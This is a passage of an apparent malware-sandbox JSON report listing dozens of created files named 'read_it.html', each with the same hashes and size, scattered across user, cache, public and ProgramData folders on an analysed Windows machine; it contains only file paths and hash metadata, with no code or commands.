"f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_217", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\07\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_219", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\7f\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_221", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\1f\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_223", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\e5\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_225", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_227", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ce\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_229", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ae\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_231", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\fd\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_233", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\e0\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_235", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\c3\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_237", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\8d\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_239", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\49\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_241", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\2c\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_243", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\10\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_245", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\ae\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_247", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\67\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_249", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\7\\26\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_251", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\f1\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_253", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\1b\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_255", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\ee\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_257", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\20\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_259", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\3\\da\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_261", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\bc\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_263", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\59\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_265", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\f6\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_267", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\e4\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_269", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\14\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_271", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\0c\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_272", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\03\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_273", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\f4\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_274", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\e1\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_275", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\cb\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_276", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\a8\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_277", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\98\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_278", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_279", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\profiles\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_280", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_281", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_282", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_283", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\videos\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_284", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\videos\\sample videos\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_285", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\recorded tv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_286", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_287", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\pictures\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_288", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_289", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\music\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_290", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\music\\sample music\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_291", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\libraries\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_292", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\downloads\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_293", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\public\\documents\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_294", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\programdata\\sun\\java\\java update\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_295", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_296", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_297", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_298", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_299", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_300", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", 